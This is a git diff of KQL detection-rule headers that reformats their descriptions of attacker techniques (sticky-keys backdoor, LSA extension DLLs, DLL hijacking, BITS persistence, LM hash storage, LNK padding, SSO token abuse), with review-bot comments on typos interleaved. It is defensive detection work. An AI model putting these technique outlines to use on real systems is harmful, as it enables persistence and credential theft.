 // Description: Detects attempts to disable windows recovery environment using Reagentc.
-ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
-It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
-
+// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
+// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
 // False Positives:
diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
index c897e99c..068f7377 100644
--- a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
+++ b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
@@ -3,8 +3,7 @@
 // Date: 2022-02-11
 // Level: medium
 // Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
-This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
-
+// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1566.001
 // False Positives:
diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/Initial Access/office_macro_file_download.kql
index ad71288f..8a198700 100644
--- a/KQL/rules/Initial Access/office_macro_file_download.kql
+++ b/KQL/rules/Initial Access/office_macro_file_download.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-23
 // Level: low
 // Description: Detects the creation of a new office macro files on the system via an application (browser, mail client).
-This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
-
+// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1566.001
 // False Positives:
diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
index 716880e7..6607f99e 100644
--- a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
+++ b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
@@ -3,8 +3,7 @@
 // Date: 2025-07-22
 // Level: high
 // Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.
-This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
-
+// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1566.001
 // False Positives:
diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
index 983a2cee..c5bf10b1 100644
--- a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
+++ b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
@@ -3,8 +3,7 @@
 // Date: 2025-07-24
 // Level: high
 // Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.
-This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.
-
+// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
index c0613ed3..40924da6 100644
--- a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
+++ b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
@@ -3,10 +3,9 @@
 // Date: 2025-03-19
 // Level: high
 // Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).
-Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.
-The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.
-This rule flags suspicious use of such padding observed in real-world attacks.
-
+// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.
+// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.
+// This rule flags suspicious use of such padding observed in real-world attacks.
 // MITRE Tactic: Initial Access
 // Tags: attack.initial-access, attack.execution, attack.t1204.002
diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql
index 8c969a5b..2374defc 100644
--- a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql
+++ b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-29
 // Level: high
 // Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
-
 // MITRE Tactic: Lateral Movement
 // Tags: attack.lateral-movement, attack.t1021.002
diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
index db0ceee6..4e94032f 100644
--- a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
+++ b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-07
 // Level: medium
 // Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
-Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-
+// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
 // MITRE Tactic: Lateral Movement
 // Tags: attack.lateral-movement, attack.t1021.001
 // False Positives:
diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql
index 03f89a4b..5808e874 100644
--- a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql
+++ b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql
@@ -3,8 +3,7 @@
 // Date: 2019-05-15
 // Level: high
 // Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
-An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
-
+// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
 // MITRE Tactic: Lateral Movement
 // Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002
 // False Positives:
diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
index ba3cdbcd..e3c243d4 100644
--- a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
+++ b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-13
 // Level: high
 // Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
-
 // MITRE Tactic: Lateral Movement
 // Tags: attack.t1021.003, attack.lateral-movement
diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql
index 1d58721a..13fef618 100644
--- a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql
+++ b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql
@@ -3,7 +3,6 @@
 // Date: 2025-10-22
 // Level: medium
 // Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
-
 // MITRE Tactic: Lateral Movement
 // Tags: attack.lateral-movement, attack.t1021.006
 // False Positives:
diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
index bf99d8de..6dad275c 100644
--- a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
+++ b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-22
 // Level: high
 // Description: Detects the execution of Winrs.exe where it is used to execute commands locally.
-Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
-
+// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
 // MITRE Tactic: Lateral Movement
 // Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
index dab5469d..1cff4d81 100644
--- a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
+++ b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
@@ -3,8 +3,7 @@
 // Date: 2022-07-30
 // Level: high
 // Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
+// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
index eac11d71..3ac845dc 100644
--- a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
+++ b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
@@ -3,9 +3,8 @@
 // Date: 2021-07-22
 // Level: medium
 // Description: Detects when a user enables DNS-over-HTTPS.
-This can be used to hide internet activity or be used to hide the process of exfiltrating data.
-With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
-
+// This can be used to hide internet activity or be used to hide the process of exfiltrating data.
+// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112
 // False Positives:
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/Persistence/enable_lm_hash_storage.kql
index ebf62ff6..4a343b3f 100644
--- a/KQL/rules/Persistence/enable_lm_hash_storage.kql
+++ b/KQL/rules/Persistence/enable_lm_hash_storage.kql
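Review bot: The Description in dll_search_order_hijackig_via_additional_space_in_path.kql still reads "Detects when an attacker create a similar folder structure" on the context line that the added `// but with a space …` line continues; since this hunk already rewrites the continuation, the sentence should be fixed to `// Description: Detects when an attacker creates a similar folder structure to windows system folders such as (Windows, Program Files...)`. The file name itself carries the misspelling "hijackig", which is visible in the diff header but is outside what this hunk changes and would need a separate rename. The rest of the rule file lies outside the hunk.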
@@ -3,8 +3,7 @@
 // Date: 2023-12-15
 // Level: high
 // Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
index 798ffe5e..7bc80978 100644
--- a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
+++ b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
@@ -3,8 +3,7 @@
 // Date: 2023-12-15
 // Level: high
 // Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
index 540adb33..6907e509 100644
--- a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
+++ b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
@@ -3,9 +3,8 @@
 // Date: 2021-08-21
 // Level: high
 // Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
+// In it's default mode, it builds a self deleting .bat file which executes malicious command.
+// The detection rule relies on creation of the malicious bat file (debug.bat by default).
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
 // False Positives:
diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
index 1bd9aa24..0182d337 100644
--- a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
+++ b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-12
 // Level: high
 // Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
+// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
index dc78d7b3..b0ce1d9b 100644
--- a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
+++ b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
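Review bot: The re-commented description lines in hacktool_powerup_write_hijack_dll.kql keep the source text's typos on the new `+//` lines, and since this commit already rewrites each of them it is the cheapest place to fix them: `+// In it's default mode, it builds a self deleting .bat file which executes malicious command.` should read `+// In its default mode, it builds a self-deleting .bat file which executes a malicious command.`. The same applies to `privilleged` (→ `privileged`) in the persistence_via_sticky_key_backdoor.kql hunk and to `if the remote server has been compromise` (→ `compromised`) in both restrictedadminmode_registry_value_tampering hunks. Also worth noting, though it sits on a context line rather than a changed one, that the malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql description stops mid-sentence at `where the OneDrive or Team applications`; a follow-up could complete it with the install location the rule actually matches on.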
@@ -3,9 +3,8 @@
 // Date: 2025-10-17
 // Level: high
 // Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
-Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
-This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
-
+// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
+// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.impact, attack.t1653
 // False Positives:
diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
index d84ce3f5..6f1fd198 100644
--- a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
+++ b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
@@ -3,10 +3,9 @@
 // Date: 2020-10-29
 // Level: medium
 // Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
-When the job runs on the system the command specified in the BITS job will be executed.
-This can be abused by actors to create a backdoor within the system and for persistence.
-It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
-
+// When the job runs on the system the command specified in the BITS job will be executed.
+// This can be abused by actors to create a backdoor within the system and for persistence.
+// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1197
diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
index 1843453b..71d92e82 100644
--- a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
+++ b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
@@ -3,9 +3,8 @@
 // Date: 2022-11-18
 // Level: high
 // Description: Detects changes to the NGenAssemblyUsageLog registry key.
-.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
-By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
-
+// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
index 7b2543b6..2ef19710 100644
--- a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
+++ b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
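Review bot: The first new comment line in net_ngenassemblyusagelog_registry_key_tamper.kql ends with `(as described in the next section)`, a cross-reference carried over from the write-up this description was taken from; a rule header has no "next section", so the parenthetical should be dropped so that an analyst reading the rule is not sent looking for text that does not exist. The second new line's `By simplify specifying an arbitrary value` should read `By simply specifying an arbitrary value`. Both lines are already rewritten by this commit, so the wording fix fits here without touching anything else.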
@@ -3,9 +3,8 @@
 // Date: 2022-06-19
 // Level: high
 // Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-Adversaries may abuse time providers to execute DLLs when the system boots.
-The Windows Time service (W32Time) enables time synchronization across and within domains.
-
+// Adversaries may abuse time providers to execute DLLs when the system boots.
+// The Windows Time service (W32Time) enables time synchronization across and within domains.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003
diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
index 54c2e904..a46ba71c 100644
--- a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
+++ b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
@@ -3,12 +3,11 @@
 // Date: 2022-07-21
 // Level: medium
 // Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
-The disk cleanup manager is part of the operating system.
-It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
+// The disk cleanup manager is part of the operating system.
+// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence
diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
index 7b53e8cb..17e4ebb7 100644
--- a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
+++ b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
@@ -3,8 +3,7 @@
 // Date: 2020-02-18
 // Level: critical
 // Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
-When the sticky keys are "activated" the privilleged shell is launched.
-
+// When the sticky keys are "activated" the privilleged shell is launched.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation
 // False Positives:
diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
index 336bfe26..ee688555 100644
--- a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
+++ b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
@@ -3,8 +3,7 @@
 // Date: 2020-07-15
 // Level: low
 // Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
-An attacker can use this to authenticate to Azure AD in a browser as that user.
-
+// An attacker can use this to authenticate to Azure AD in a browser as that user.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
 // False Positives:
diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
index 63ed0524..d8fcf124 100644
--- a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
+++ b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
@@ -3,7 +3,6 @@
 // Date: 2021-06-29
 // Level: high
 // Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
 // False Positives:
diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
index a3b0ff5c..c3a246da 100644
--- a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
+++ b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-09
 // Level: medium
 // Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
-The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
-
+// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence
diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
index e8da8e44..ff0b870a 100644
--- a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
@@ -3,12 +3,11 @@
 // Date: 2022-07-21
 // Level: medium
 // Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
-The disk cleanup manager is part of the operating system. It displays the dialog box […]
-The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
+// The disk cleanup manager is part of the operating system. It displays the dialog box […]
+// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence
 // False Positives:
diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
index dab9596b..77025f5f 100644
--- a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
@@ -3,8 +3,7 @@
 // Date: 2022-07-21
 // Level: high
 // Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
-The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
-
+// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence
 // False Positives:
diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
index 6f4c3d7e..5fe0eea1 100644
--- a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
+++ b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2019-01-16
 // Level: medium
 // Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
index 0a3db4bb..1b55b96f 100644
--- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-12-21
 // Level: medium
 // Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
 // False Positives:
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
index 3620513c..cc991980 100644
--- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
@@ -3,8 +3,7 @@
 // Date: 2023-12-21
 // Level: medium
 // Description: Detects registry value settings that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
 // False Positives:
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
index 613c08f2..e0f8d060 100644
--- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
@@ -3,7 +3,6 @@
 // Date: 2017-03-19
 // Level: high
 // Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.command-and-control, attack.t1571
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
index 88a88ae5..6b9b71f8 100644
--- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
